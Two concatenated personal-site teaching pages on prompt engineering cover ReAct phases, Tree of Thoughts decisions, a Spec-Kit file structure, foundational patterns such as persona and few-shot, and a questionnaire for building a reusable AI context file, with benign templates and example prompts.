# https://jrlopez.dev/p/prompting-advanced.html
---
title: "Prompt Patterns (Advanced)"
description: "ReAct, Tree of Thoughts, self-consistency, constitutional AI."
author: "Joey Lopez"
date: "2025-11-05"
tags: ["prompting", "reference", "teaching"]
atom_id: 5
source_html: "prompting-advanced.html"
url: "https://jrlopez.dev/p/prompting-advanced.html"
generated: true
---
[jrlopez.dev ]()[ReAct ]()[Tree of Thoughts ]()[Spec-Kit ]()[When to Use ]()[Reference ]()
# Advanced Prompting Patterns When foundational patterns aren't enough. Multi-step reasoning, decision frameworks, and orchestrated workflows. Joey Lopez [ReAct ]()[Tree of Thoughts ]()[Spec-Kit ]()Pattern 1
## ReAct: Think → Act → Observe ReAct is a multi-phase reasoning pattern where you explicitly separate thinking from action. The key insight is that you don't just dump everything into one prompt—you pause at validation checkpoints between phases. I use this when each step builds on the previous one and I need confidence that we're not compounding errors. Before moving to the next phase, I check: Did the last step actually work? Core Idea ReAct (Reasoning + Acting) was formalized by Yao et al. (2022). The principle: explicit validation checkpoints between reasoning phases prevent hallucination chains from cascading.
### When to Use ReAct
- Multi-step tasks where each step depends on previous results
- You need to verify before continuing (database migrations, system changes, complex data pipelines)
- Error recovery is critical—you want to catch issues immediately, not at the end
- The task involves both planning and execution
### The Template ReAct Phase Structure
```
## Phase 1: [Name]
THINK: [What must be true before we act? What are we checking?]
ACT: [Specific, concrete tasks]
CHECK: [How do we verify this succeeded? What's the success criterion?]
## Phase 2: [Name]
THINK: [What did Phase 1 give us? What changed?]
ACT: [Next concrete tasks, informed by Phase 1 results]
CHECK: [Validation step]
[Repeat as needed]
```
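The template can be driven by a loop that refuses to advance until CHECK passes, which is what stops errors from compounding. A hedged Python sketch; the toy `act`/`check` callables stand in for your real LLM calls and independent verifications:

```python
def react_run(phases, max_retries=2):
    """Execute phases in order; a phase's CHECK must pass before the next
    phase starts, so a failed step can't silently poison later ones."""
    for name, act, check in phases:
        for attempt in range(max_retries + 1):
            result = act()             # ACT: do the concrete work
            if check(result):          # CHECK: verify independently
                break
            print(f"{name}: check failed (attempt {attempt + 1})")
        else:
            raise RuntimeError(f"{name}: CHECK never passed, stopping here")
    return "all phases verified"

# Toy phases standing in for the migration example below:
phases = [
    ("schema analysis", lambda: {"tables": 3}, lambda r: r["tables"] > 0),
    ("script generation", lambda: "ALTER TABLE ...", lambda r: "ALTER" in r),
]
print(react_run(phases))  # all phases verified
```

The `else` on the retry loop is the whole pattern in miniature: no pass, no progress.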
### Real Example: Database Migration Database Migration via ReAct
```
## Phase 1: Schema Analysis
THINK: Do we understand the current schema? Are there constraints we'll break?
ACT:
- Inspect current table structure
- List all foreign keys and indexes
- Identify nullable vs non-nullable columns
CHECK: We have a complete picture of the schema. No surprises when we migrate.
## Phase 2: Migration Script Generation
THINK: Given what Phase 1 showed us, what migration script is safe?
ACT:
- Generate the migration using the constraints from Phase 1
- Include rollback statements
CHECK: Script is syntactically valid and includes rollback.
## Phase 3: Staging Deployment
THINK: Does this work in a realistic environment?
ACT:
- Run against staging database (copy of production)
- Verify data integrity post-migration
- Check query performance
CHECK: No errors on staging. Query performance acceptable.
## Phase 4: Production
THINK: We have evidence from staging. Are we ready?
ACT:
- Create production backup
- Run migration
- Verify against production data
CHECK: Migration succeeded. Data integrity confirmed. Rollback tested and works.
```
The Insight The CHECK step is what separates ReAct from just writing a longer prompt. You're forcing explicit validation. If the model says "check passed," you actually verify it independently. This is where the reliability comes from. Pattern 2
## Tree of Thoughts: Explore Before Committing Tree of Thoughts is about generating multiple approaches to a decision, evaluating their tradeoffs, then choosing one with documented reasoning. You're not just picking the first reasonable option—you're deliberately exploring the decision space. I use this when a decision has real tradeoffs. The output isn't just the choice; it's the reasoning that justifies it. That reasoning becomes reusable for future similar decisions. Core Idea Tree of Thoughts (Yao et al., 2023) formalizes decision-making as a multi-branch search. You generate candidate approaches, evaluate each against criteria, then select the best with explicit justification.
### When to Use Tree of Thoughts
- Multiple valid approaches exist with different tradeoffs
- You need to document WHY you chose one over others (for future reference or stakeholders)
- The decision affects downstream work or architecture
- Risk tolerance matters—some options are safer than others
### The Template Tree of Thoughts Decision Structure
```
## Decision: [What's being decided?]
[Context: Why are we deciding? What's at stake?]
### Option A: [Name]
- Pros: [Benefits, what goes right]
- Cons: [Drawbacks, what goes wrong]
- Effort: [Implementation cost, e.g., 2 days]
- Risk: [Low / Med / High, and why]
### Option B: [Name]
- Pros: [...]
- Cons: [...]
- Effort: [...]
- Risk: [...]
### Option C: [Name]
[Same structure]
### Recommendation
Choose [X] because [explicit reasoning given constraints].
Key tradeoff we're accepting: [What are we giving up?]
```
### Real Example: Security Config Modernization
Migration strategy via Tree of Thoughts:
```
## Decision: Modernize API authentication to OAuth 2.0
Context: Current system uses API keys in headers. It's insecure and hard to audit.
We need to move but must maintain backward compatibility for 90 days (Q2 migration window).
### Option A: Keep Current System
- Pros: Zero effort, zero risk, no breaking changes
- Cons: Security risk remains, audit trail weak, tech debt grows
- Effort: 0 days
- Risk: Low (no change = no breakage)
### Option B: Parallel Systems (Recommended)
- Pros: Gradual migration path, clients can transition at own pace, rollback is safe
- Cons: Two auth systems to maintain for 90 days, testing burden is higher
- Effort: 5 days (OAuth implementation + migration logic)
- Risk: Medium (complexity of dual-system, but reversible)
### Option C: Full Cutover
- Pros: Clean break, one auth system, audit trail complete
- Cons: Breaking change, forces all clients to migrate immediately, 24h downtime expected
- Effort: 3 days (faster because no parallel logic)
- Risk: High (client outages, support burden)
### Recommendation
Choose Option B (Parallel Systems) because:
- We have a 90-day window; gradual migration is safer
- Client ecosystem is fragmented; not everyone can upgrade in parallel
- Tradeoff we're accepting: 5 days of dev vs. 90 days of operational complexity (worth it)
- Rollback path is clear if OAuth implementation has issues
```
**The insight:** You'll make this decision again. By documenting your reasoning upfront -- why you rejected Option C, what tradeoff made Option B worth the effort -- you save yourself from re-litigating the same choice six months from now.
## Spec-Kit: Separation of Concerns for Complex Tasks
Spec-Kit is a file structure pattern. Instead of dumping everything into one massive prompt, you split complex work into 3-4 files that build on each other. Each file has a clear job. This scales to much larger problems than a single prompt can handle. I use this when context is too large or the task is repeatable. The knowledge base becomes write-once, use-forever. Every future task in that domain inherits it.
**Core idea:** Spec-Kit is named after the specification kits used in aerospace and manufacturing. One document describes the system forever (the knowledge base). Each project applies it to solve a specific instance (specification + plan). Context grows with complexity, not with each new task.
### The Three Files
#### 1. knowledge-base.md (Write Once)
Domain context, architectural decisions, constraints, terminology. Answers questions like:
- What is this system's architecture?
- What constraints do we always operate under?
- What terminology does this domain use?
- What decisions have we already made and why?
You write this once. Every future task in this domain reads it. It pays dividends over time.
#### 2. specification.md (Task-Specific)
This task's requirements, acceptance criteria, edge cases. It reads the knowledge base and says "given all that, here's what we need to do right now."
- What is the goal?
- What's in scope? What's out?
- How do we know when we're done?
- What edge cases matter?
#### 3. implementation-plan.md (Task-Specific)
Phased execution with dependencies and validation checkpoints. This is where you apply ReAct and Tree of Thoughts to the specific task.
- Phase 1: [What goes first? Why?]
- Phase 2: [What depends on Phase 1?]
- Validation: [How do we know each phase succeeded?]
- Rollback: [How do we undo if something fails?]
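At prompt time, the three files get fed to the model in dependency order. A sketch of one way to do that concatenation — the file names follow the convention above, and `assemble_context` is a hypothetical helper, not part of any spec-kit tooling:

```python
from pathlib import Path

# Dependency order: domain context first, then requirements, then the plan.
SPEC_KIT_FILES = ["knowledge-base.md", "specification.md", "implementation-plan.md"]

def assemble_context(task_dir: str) -> str:
    """Concatenate whichever Spec-Kit files exist, in dependency order."""
    parts = []
    for name in SPEC_KIT_FILES:
        path = Path(task_dir) / name
        if path.exists():  # e.g. the plan may not be written yet on day one
            parts.append(f"<!-- {name} -->\n{path.read_text(encoding='utf-8')}")
    return "\n\n".join(parts)
```

Because the knowledge base comes first, every task-specific file is read by the model in the light of the domain context it inherits.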
### When to Use Spec-Kit
- Complex, multi-step work that's hard to fit in a single prompt
- The task is repeatable or similar tasks will follow (migrations, architecture decisions, configurations)
- You need to collaborate with others (specs serve as shared references)
- High-stakes decisions where getting it right matters more than speed
- Across technical and non-technical domains (works for business tasks too—interview prep, priority documents, fundraising pitch)
### Template: knowledge-base.md
Reusable domain context:
```
# Knowledge Base: [Domain Name]
## System Architecture
[How is this system organized? What are the main components?]
## Constraints
[What's always true? What can never change?]
- [Constraint 1]
- [Constraint 2]
## Terminology
| Term | Definition |
| --- | --- |
| [Term] | [Definition] |
## Key Decisions Made
- [Decision 1]: [Why we chose this]
- [Decision 2]: [Why we chose this]
## Common Patterns
[How do we usually solve problems in this domain?]
```
### Template: specification.md
Task-specific requirements:
```
# Specification: [Task Name]
## Goal
[What are we trying to achieve?]
## Context
[Why are we doing this? What's the business reason?]
## Scope
### In Scope
- [Requirement 1]
- [Requirement 2]
### Out of Scope
- [What we're explicitly not doing and why]
## Acceptance Criteria
- [ ] Criterion 1
- [ ] Criterion 2
## Edge Cases
[What could go wrong? What's unusual about this task?]
```
### Template: implementation-plan.md
Phased execution plan:
```
# Implementation Plan: [Task Name]
## Phase 1: [Name]
Depends on: [Nothing / Phase 0]
Duration: [Estimate]
THINK: [What do we need to verify before acting?]
ACT: [Concrete tasks]
CHECK: [Validation step]
## Phase 2: [Name]
Depends on: [Phase 1]
Duration: [Estimate]
THINK: [...]
ACT: [...]
CHECK: [...]
## Rollback
[How do we undo this if something goes wrong?]
```
### Cross-Domain Example
Spec-Kit works everywhere. Here's how you'd apply it to interview prep (business, not technical):
Business task: interview prep
```
## knowledge-base.md
### Company Context
- Founded 2015, 800 people, Series C
- Fundraising in Q3 targeting $50M
- Product: Developer tools for monitoring
### Common Questions We See
- "How do you handle scale?" → Technical depth needed
- "What's your vision?" → CEO alignment matters
- "Why join now?" → Understanding their fundraising matters
## specification.md
### Goal
Prepare for interviews at TechCorp for Staff Engineer role
### Acceptance Criteria
- [ ] Can answer 15 technical depth questions
- [ ] Can articulate how my background aligns with their problems
- [ ] Can explain why this role at this stage
## implementation-plan.md
### Phase 1: Deep Dive on Technical Stack
- Spend 4 hours on their architecture docs
- Run their demo, break it, understand failure modes
### Phase 2: Study Their Problems
- What are 3 things they're probably struggling with at scale?
- How does my experience address those?
### Phase 3: Interview Dry Run
- Friend asks random interview questions
- Get feedback on clarity and depth
```
**Important:** Don't over-engineer. If the task is "rename a variable," you don't need Spec-Kit. Use it when complexity is real, when context is large, or when you're solving the same problem more than once.
## Choosing the Right Pattern
These patterns aren't mutually exclusive. The question isn't "which one should I use?" It's "which combination solves this task cleanly?"
### Decision Table
| Task Type | Pattern | Why This Works |
| --- | --- | --- |
| Simple, well-understood | Foundational (Persona + Few-Shot) | Don't add complexity where it doesn't belong |
| Multi-step with dependencies | ReAct | Validation checkpoints prevent error cascades |
| Decision with real tradeoffs | Tree of Thoughts | Documented reasoning is reusable |
| Complex, high-stakes, repeatable | Spec-Kit | Separation of concerns scales to large contexts |
| Large task combining all of the above | Combine them | ReAct phases + ToT decisions + Spec-Kit files |
### Practical Combinations
**Scenario 1: Database Migration**
- Use Spec-Kit: knowledge-base describes the system, specification says which tables, plan says which phases
- Use ReAct: Each phase has THINK/ACT/CHECK steps
- Result: Highly structured, low-risk execution
**Scenario 2: Architecture Decision**
- Use Tree of Thoughts: Explore monolith vs. microservices vs. serverless
- Use Spec-Kit knowledge-base: Document constraints (team size, latency requirements, budget)
- Result: Justified decision that stakeholders understand
**Scenario 3: Feature Implementation**
- Use Spec-Kit: knowledge-base for domain context, specification for requirements
- Use ReAct: Implementation plan with phases
- Result: Clear scope, execution discipline, testable outcomes
**Anti-pattern: over-engineering simple tasks.** If you're adding ReAct phases to rename a variable or using Spec-Kit for a 10-minute task, you've lost the plot. These patterns have cognitive overhead. They pay off when complexity is real.
**Rule of thumb:** Start simple. If you find yourself confused about state, unsure where you are in the task, or making the same decision repeatedly, that's when you upgrade to a more complex pattern.
## Quick Reference
### Papers & Sources
| Pattern | Citation | Key Insight |
| --- | --- | --- |
| ReAct | Yao et al. (2022), "ReAct: Synergizing Reasoning and Acting in Language Models" | Validation checkpoints between reasoning phases |
| Tree of Thoughts | Yao et al. (2023), "Tree of Thoughts: Deliberate Problem Solving with Large Language Models" | Multi-branch exploration before committing |
| Prompt Patterns | White et al. (2023), "A Prompt Pattern Catalog to Enhance Prompt Engineering with ChatGPT" | 16+ catalogued patterns (foundational and advanced) |
### Related Resources
[Foundational Prompting Patterns]() covers Persona, Few-Shot, Chain-of-Thought, and Output Format. Those are your building blocks. The patterns here are what you build when the foundational ones aren't enough.
### When You're Stuck
- **Task feels too large to fit in one prompt: **Use Spec-Kit
- **You keep making the same decision over again: **Use Tree of Thoughts (document your reasoning)
- **Each step depends on the previous one: **Use ReAct with CHECK steps
- **You're not sure if it worked: **Add validation checkpoints
- **You're over-engineering:** Strip it back. Start simple. Upgrade when complexity demands it.
Joey Lopez · 2026 · [jrlopez.dev]()
---
# prompting.md
# https://jrlopez.dev/p/prompting.html
---
title: "Prompt Patterns (Foundational)"
description: "Zero-shot, few-shot, chain-of-thought, persona, template."
author: "Joey Lopez"
date: "2025-10-20"
tags: ["prompting", "reference", "teaching", "template"]
atom_id: 4
source_html: "prompting.html"
url: "https://jrlopez.dev/p/prompting.html"
generated: true
---
# Prompt Engineering Notes
Workshop notes cleaned up. Patterns, anti-patterns, and exercises from real sessions. Take what's useful.
Joey Lopez
I didn't invent any of this. Chain of Thought is from Wei et al., Tree of Thoughts is from Yao et al., the Persona and Template patterns are catalogued in White et al. I just organized them in the order I wish someone had shown me.
## The gap
The fastest way to understand prompt engineering is to feel the difference. Here's a quick exercise I use in workshops.
**Try this:** Open whatever AI tool you use. Type this and save the output:
```
Write a Python function that validates email addresses.
```
Then try this one. Same task:
```
You are a senior Python developer building a user registration API.
Write an email validation function with these requirements:
- Must handle edge cases: plus-addressing (user+tag@domain),
international domains, and subdomains
- Return a typed result (valid/invalid) with specific error reasons
- Include type hints and follow PEP 8
Example input/output:
validate_email("user@example.com") -> ValidationResult(valid=True)
validate_email("user@") -> ValidationResult(valid=False, error="Missing domain")
validate_email("user+tag@sub.example.co.uk") -> ValidationResult(valid=True)
Constraints:
- Do NOT use the 're' module for the core logic
- Must handle at least 5 explicit edge cases
- Include docstring with usage examples
```
Same AI. Same model. Same task. The second output is more specific, more tested, more usable. The difference isn't what the AI knows -- it's what you gave it to work with. That's basically the whole idea. Everything below -- every pattern, every template -- is just a different way of getting the right context in front of the model faster.
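For reference, here's one plausible shape of what the structured prompt asks for -- a minimal, regex-free sketch of the validator, not a production implementation (full RFC 5322 parsing is far more involved), with illustrative names matching the examples above:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class ValidationResult:
    valid: bool
    error: Optional[str] = None

def validate_email(address: str) -> ValidationResult:
    """Structural email validation without the 're' module."""
    if address.count("@") != 1:
        return ValidationResult(False, "Must contain exactly one '@'")
    local, domain = address.split("@")
    if not local:
        return ValidationResult(False, "Missing local part")
    if not domain:
        return ValidationResult(False, "Missing domain")
    if "." not in domain:
        return ValidationResult(False, "Domain must contain a dot")
    if domain.startswith(".") or domain.endswith("."):
        return ValidationResult(False, "Domain cannot start or end with a dot")
    if ".." in local or ".." in domain:
        return ValidationResult(False, "Consecutive dots are not allowed")
    return ValidationResult(True)  # plus-addressing and subdomains pass these checks
```

Notice how much of this structure -- the typed result, the specific error strings, the edge cases -- was dictated by the prompt, not invented by the model.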
### Three intuitions
These explain most of what happens in AI interactions:
| Intuition | What it means | Analogy |
| --- | --- | --- |
| **Context is everything** | The model completes patterns from what you give it. More relevant context = better output. | A vague Jira ticket produces vague work. |
| **Structure gets rewarded** | Organized input produces organized output. The model was trained to respect structure. | A well-formatted code review gets better responses than a wall of text. |
| **You are the retrieval system** | Every AI interaction is: retrieve context, assemble it, generate. The question is who's doing the retrieval. | Re-explaining your project every conversation = doing retrieval by hand. |
These three ideas explain RAG, prompt engineering, context windows, and most of what enterprise AI platforms do. The terminology doesn't matter yet. The intuitions do.
## Three approaches
Not every task needs the same level of effort. Using a four-file spec-driven workflow to fix a typo is overkill. I think about it as: what are the stakes?
**Simple, one-off task?**
Yes → Freestyle. Just type and send.
No ↓
**Will you repeat this? Does quality matter? **
Yes → Systematic prompt. Add patterns.
No ↓
**Complex, multi-step, or high-stakes? **
Yes → Spec-driven. Multiple files, structured workflow.
### Freestyle
Just talk to the AI. No structure, no patterns. This is how most people use AI most of the time, and for quick questions and throwaway tasks, it's fine.
**Use it for:** Quick questions, brainstorming, anything you'd delete in an hour.
**Stop using it when:** You find yourself re-explaining context, correcting output, or doing the same task twice.
### Systematic prompts
Apply named patterns -- persona, few-shot, chain-of-thought, output format -- to a single prompt. This is the workhorse.
Freestyle:
```
Help me review this pull request.
```
Generic feedback. Misses project conventions.
Systematic:
```
You are a senior code reviewer
focused on maintainability.
Review this PR against these criteria:
- Error handling completeness
- Test coverage for edge cases
- Naming conventions (camelCase)
Flag severity: MUST FIX / SHOULD FIX / NIT
Example:
MUST FIX: Missing null check on line 42.
userService.getUser() can return null
but is used without guard.
PR diff:
[paste diff]
```
Specific, actionable, consistently formatted.
### Spec-driven
For complex multi-step work: separate your knowledge, requirements, and execution plan into distinct files. Feed them to the AI in order.
**The three files:**
| File | Contains | Reusable? |
| --- | --- | --- |
| knowledge-base.md | Domain context, architecture decisions, constraints, terminology | Yes -- project-level |
| specification.md | This feature's requirements, acceptance criteria, edge cases | No -- feature-level |
| implementation-plan.md | Phased execution, dependencies, validation checkpoints | No -- task-level |
The knowledge base is write-once, use-forever. You build it on day one and every future spec inherits it.
### Where these come from
These aren't categories I made up. They map to existing industry practices:
| Approach | Industry equivalent | Maturity |
| --- | --- | --- |
| Freestyle | Ad-hoc ChatGPT/Copilot usage | Universal |
| Systematic | ADRs + .github/copilot-instructions.md | 10+ years |
| Spec-driven | GitHub spec-kit, Kiro, structured file workflows | Experimental |
**Honest assessment:** Systematic prompts (ADRs + config files) are **proven at scale** across Microsoft, AWS, Google, Netflix, and Spotify. Spec-driven workflows are newer and less battle-tested. Both work. The difference is maintenance overhead vs. task complexity. Use the simplest approach that handles your complexity. Escalate when you need to, not before.
## Patterns
Every effective prompt is built from a small set of composable patterns. I think of them like tools in a toolbox -- a hammer isn't better than a screwdriver, but using a hammer on a screw will ruin your day.
### Foundational patterns
These four cover roughly 80% of daily prompt engineering. I'd get comfortable with these before reaching for the advanced ones.
#### Persona (proven)
I use this when I need domain expertise, consistent tone, or a specific frame of reference.
**Template:**
```
You are [role] with [specific expertise].
Your focus areas include [domains].
[Task]
```
Without persona
```
Explain this database schema.
```
With persona
```
You are a database architect
specializing in high-throughput
transactional systems.
Explain this schema, focusing on:
- Indexing strategy
- Query performance implications
- Normalization tradeoffs
```
**Why it works:** The persona biases the model toward responses that people with that expertise would produce in the training data. The more specific the persona, the more targeted the activation.
**Source:** White et al. (2023), "A Prompt Pattern Catalog" -- arXiv 2302.11382
#### Few-Shot (proven)
I use this when showing is faster than explaining -- when I have a transformation or format that's hard to describe but easy to demonstrate.
**Template:**
```
Transform inputs using these examples:
Example 1:
Input: [example input]
Output: [example output]
Example 2:
Input: [example input]
Output: [example output]
Now transform:
Input: [your actual input]
```
Without examples
```
Convert these Java imports
to the new namespace.
```
With examples
```
Convert imports using these rules:
Example:
Before: import javax.validation.Valid;
After: import jakarta.validation.Valid;
Example:
Before: import javax.servlet.http.*;
After: import jakarta.servlet.http.*;
Now convert:
import javax.persistence.Entity;
```
**Why it works:** Two to three examples establish a pattern more reliably than a paragraph of instructions. The model extracts the transformation rule and applies it. More than three examples rarely helps -- diminishing returns set in fast.
**Source:** Brown et al. (2020), "Language Models are Few-Shot Learners" -- the GPT-3 paper
#### Chain-of-Thought (proven)
I use this when the task requires multi-step reasoning or debugging, and I need to see (and verify) the logic.
**Template:**
```
Solve this step by step:
1. First, analyze [aspect]
2. Then, evaluate [aspect]
3. Next, consider [aspect]
4. Finally, recommend [action]
Show your reasoning for each step.
```
Without CoT
```
Why is this API slow?
```
With CoT
```
Debug this API latency issue
step by step:
1. Check the query execution plan
2. Identify N+1 query patterns
3. Evaluate connection pool config
4. Check for missing indexes
5. Review payload size
Show reasoning for each step.
Endpoint: GET /api/users
Avg response: 2.3s
Expected: <200ms
```
**Why it works:** Step-by-step reasoning reduces errors on complex tasks by 10-30% in benchmarks. More importantly, it makes errors visible. When you can see the reasoning chain, you can catch where it went wrong instead of getting a confidently wrong final answer.
**Source:** Wei et al. (2022), "Chain-of-Thought Prompting Elicits Reasoning in Large Language Models" -- arXiv 2201.11903
#### Output Format / Template (proven)
I use this when I need consistent, parseable, or copy-paste-ready output -- when the format matters as much as the content.
**Template:**
```
Respond in this exact format:
## Summary
[2-3 sentences]
## Changes Required
- [ ] Change 1: [description]
- [ ] Change 2: [description]
## Risk Assessment
| Risk | Severity | Mitigation |
|------|----------|------------|
| ... | ... | ... |
```
**Why it works:** The model was trained on millions of interactions where structured requests got structured responses. When you provide a template, the output almost always mirrors it.
### Advanced patterns
I reach for these when the foundational patterns aren't enough -- when there are dependencies between steps, multiple valid approaches, or several concerns to orchestrate.
#### ReAct (research-backed)
I use this for multi-phase work where each phase depends on the previous one and I need validation checkpoints between steps.
**Template:**
```
## Phase 1: [Name]
THINK: [What must be true before we act?]
ACT: [Specific tasks]
CHECK: [How to verify this phase succeeded]
## Phase 2: [Name]
THINK: [What did Phase 1 give us?]
ACT: [Next tasks]
CHECK: [Validation]
```
Example: database migration
```
## Phase 1: Schema Backup
THINK: Must have rollback before any DDL changes
ACT: pg_dump --schema-only > backup_schema.sql
CHECK: Backup file exists and is non-empty
## Phase 2: Add New Columns
THINK: Schema backup confirmed, safe to alter
ACT: ALTER TABLE users ADD COLUMN email_verified BOOLEAN DEFAULT FALSE;
CHECK: \d users shows new column, existing data intact
## Phase 3: Backfill Data
THINK: Column exists, now populate from legacy flag
ACT: UPDATE users SET email_verified = (status = 'verified');
CHECK: SELECT COUNT(*) FROM users WHERE email_verified IS NULL returns 0
```
**Source:** Yao et al. (2022), "ReAct: Synergizing Reasoning and Acting in Language Models"
#### Tree of Thoughts (research-backed)
I use this when multiple valid approaches exist and the tradeoffs depend on my specific context -- when I need to document why I chose option A over B.
**Template:**
```
## Decision: [What needs deciding]
### Option A: [Name]
- Pros: [benefits]
- Cons: [drawbacks]
- Effort: [estimate]
- Risk: [Low/Med/High]
### Option B: [Name]
[same structure]
### Option C: [Name]
[same structure]
### Recommendation
Choose [X] because [rationale given constraints].
```
**When not to use this:** Don't force this when only one reasonable approach exists. Manufacturing fake alternatives wastes time. If the answer is obvious, just do it.
**Source:** Yao et al. (2023), "Tree of Thoughts: Deliberate Problem Solving with Large Language Models"
#### Meta-Prompting / Orchestration (production-ready)
I use this when I need to combine multiple patterns, synthesize context from several sources, or create a reproducible workflow.
**Template:**
```
# Task: [What we're building]
## Context Synthesis
From knowledge-base.md:
- Domain rules: [extracted]
- Constraints: [extracted]
From specification.md:
- Requirements: [extracted]
- Success criteria: [extracted]
## Execution
Using ReAct phases from implementation-plan.md:
Phase 1: [action] -> Validate: [check]
Phase 2: [action] -> Validate: [check]
Using Tree of Thoughts decisions:
Decision 1: Chose [X] because [reason]
## Generate
[Final output instructions]
```
### Combining patterns
These are composable. I start with one and add others only when they earn their place:
| Task complexity | Patterns I typically use |
| --- | --- |
| Simple (5-15 min) | Persona + Few-shot |
| Medium (30-60 min) | Persona + Few-shot + Output format + Chain-of-Thought |
| Complex (hours+) | All foundational + ReAct + Tree of Thoughts + Meta-prompting |
**Common mistake:** Over-engineering simple tasks. If you're adding ReAct phases to rename a variable, you've lost the plot. Use the simplest approach that handles your complexity.
## Second brain
Every conversation, you re-explain your project, your role, your constraints. You're doing context retrieval by hand, every time. The fix is writing it down once.
### Start with 10 questions
Don't try to capture everything. Answer these in a single file. That file is your second brain v1.
The first 10 questions:
- What project are you working on right now?
- In one sentence, what does it do and who is it for?
- What's the tech stack?
- What are the 3 biggest constraints you work within?
- What does "done" look like for your typical work items?
- What mistakes do people make repeatedly on your project?
- What do you wish the AI already knew about your work?
- What output format do you prefer? (bullet points, tables, prose, code?)
- What should the AI *never* assume about your work?
- What's the one thing you re-explain in every AI conversation?
**Try this:** Create a file called my-context.md. Answer questions 1, 2, 3, and 10. Four answers, five minutes. Start a new AI conversation, paste that file at the top, and ask it to do something you'd normally do. Notice how much less explaining you need.
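The paste-the-file step can be automated in a few lines. A sketch, assuming the my-context.md convention above (`build_prompt` is an illustrative helper, not an existing tool):

```python
from pathlib import Path

def build_prompt(task: str, context_file: str = "my-context.md") -> str:
    """Prepend the reusable context file to a one-off task prompt."""
    context = Path(context_file).read_text(encoding="utf-8")
    return f"{context}\n\n---\n\nTask: {task}"
```

This is the "you are the retrieval system" intuition made literal: the retrieval step is a file read, done once instead of re-typed every conversation.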
### The full framework: 100 questions
Once the first 10 click, here's the expanded version. It's organized in two tiers:
| Tier | Goal | Questions | Time |
| --- | --- | --- | --- |
| **Tier 1: Knowledge Extraction** | Get what's in your head into notes | 50 questions across domain, requirements, tech, patterns, people | 3-4 hours |
| **Tier 2: Knowledge Composition** | Compose those notes into a reusable AI context file | 50 questions across AI usage, role, output standards, task patterns, composition | 2-3 hours |
Tier 1: Knowledge Extraction (50 questions)
#### Section A: Domain Context
- What project/product are you working on right now?
- In one sentence, what does it do and who is it for?
- What's the business problem it solves?
- Who are the main stakeholders and what do they care about?
- What's the current state vs. the desired state?
- What are the 3 biggest constraints you work within?
- What decisions have already been made that you can't change?
- What's the history? Why does it look the way it does?
- What would a new team member need to understand in their first week?
- What do people outside your team consistently misunderstand about your domain?
#### Section B: Requirements and Standards
- What does "done" look like for typical work items?
- What's the definition of quality in your context?
- What are the non-negotiable requirements?
- What are the "nice to haves" vs "must haves"?
- What approval processes exist and who's involved?
- What documentation standards do you follow?
- What testing/validation is required before shipping?
- What are the common acceptance criteria patterns?
- What gets work items rejected or sent back?
- What does your QA/review process actually check?
#### Section C: Technical Context
- What's the tech stack?
- What integrations or dependencies exist?
- What are the known technical constraints?
- What's fragile or risky to change?
- What environments exist?
- What data is involved and where does it live?
- What are the common technical gotchas?
- What's the deployment/release process?
- What monitoring or observability exists?
- What technical debt are you carrying?
#### Section D: Patterns and Anti-Patterns
- What's a well-written work item in your context? (give an example)
- What's a badly-written one? Why did it fail?
- What patterns keep recurring?
- What mistakes do people make repeatedly?
- What shortcuts exist that people should know about?
- What "obvious" solutions don't actually work and why?
- What tribal knowledge exists that isn't documented?
- What questions do new people always ask?
- What do you wish someone had told you when you started?
- What's the "right way" vs. what actually happens?
#### Section E: People and Process
- Who needs to be involved in what types of decisions?
- Who has context that others lack?
- What communication norms exist?
- What meetings matter and what do they accomplish?
- What's the escalation path when things go wrong?
- Who are the bottlenecks and why?
- What politics or sensitivities should people be aware of?
- What's the feedback loop for completed work?
- How do priorities get set and changed?
- What do you personally know that your team doesn't?
Tier 2: Knowledge Composition (50 questions)
#### Section F: Current AI Usage
- What AI tools do you currently use?
- What do you use them for?
- What works well? What outputs do you actually use?
- What doesn't work? What do you always have to fix?
- What context do you repeatedly explain to AI?
- What do you copy-paste into prompts frequently?
- What prompts do you reuse vs. write fresh?
- How much back-and-forth does it take to get useful output?
- What would "AI understands my context" look like?
- What's the highest-value task AI could help with if it had full context?
#### Section G: Role and Identity
- What's your role? What are you responsible for?
- What decisions do you make vs. defer?
- What's your deep expertise?
- What's your perspective on how things should be done?
- What standards do you hold yourself to?
- What tone/style do you communicate in?
- What are your non-negotiables?
- What do you want AI to assume about you?
- What should AI never assume about you?
- If AI were your assistant, what would a good one know?
#### Section H: Output Standards
- What does good output look like? (give an example)
- What format do you prefer?
- What level of detail is right?
- What terminology should AI use or avoid?
- What common AI outputs do you always fix?
- What would make AI output copy-paste ready?
- What's the review process for AI-generated content?
- What gets rejected and why?
- What style guides apply?
- How do you measure whether AI output was useful?
#### Section I: Task Patterns
- What types of tasks do you repeat weekly?
- For each: what's the input? What's the expected output?
- What context does each task type require?
- What are the common variations?
- What's the workflow from request to completion?
- What templates or structures do you use?
- What checklists or validation steps exist?
- What's the 80/20? (20% of tasks that are 80% of work)
- What tasks could be automated vs. need judgment?
- What's the handoff to the next step?
#### Section J: Context Composition
- Which Tier 1 notes are essential for AI?
- Which are "always relevant" vs "sometimes relevant"?
- What's the hierarchy?
- What should be included by default?
- What's the right chunk size?
- How should notes be ordered for comprehension?
- What links reveal critical related context?
- What's the minimal viable context?
- What's the maximal context?
- How do you know when the context file is "done enough"?
### The context file template
Once you've answered the questions, compose them into this format. This is the file you paste into every AI conversation:
```
# [Your Name]'s Context File
## Who I Am
[Role, expertise, standards -- from Section G]
## My Domain
[Project context, constraints, stakeholders -- from Tier 1]
## How I Work
[Task patterns, workflows, output standards -- from Sections H/I]
## What Good Looks Like
[Examples, format preferences, terminology -- from Section H]
## AI Instructions
[What to assume, what to avoid, communication style -- from Section G]
```
**How to test it:** Use your context file on three real tasks. After each one, note: how much correction was needed? What context was missing? What was noise? Update the file. By the third iteration, you should need less than 20% correction -- down from 50%+ without the file.
### Why links matter
If you use a linked note system (Obsidian, Roam, Notion with links), the connections between notes become useful:
| Tags (flat search) | Links (graph traversal) |
| --- | --- |
| "Show me notes tagged #requirements" | "Show me requirements AND everything connected to them" |
| You get what you asked for | You get what you asked for + related context you forgot |
| Good for known queries | Good for discovery |
The link structure is the advantage. When your notes eventually feed a retrieval system, links let it pull in connected context that keyword search would miss.
## Reference
### Pre-prompt checklist I run through this before writing any non-trivial prompt:
| Check | Pattern | Add if... |
| --- | --- | --- |
| Would a role help? | Persona | Task needs domain expertise |
| Can I show examples? | Few-shot | Easier to show than explain |
| Does format matter? | Output format | Need consistent/parseable output |
| Is reasoning complex? | Chain-of-Thought | Multi-step analysis or debugging |
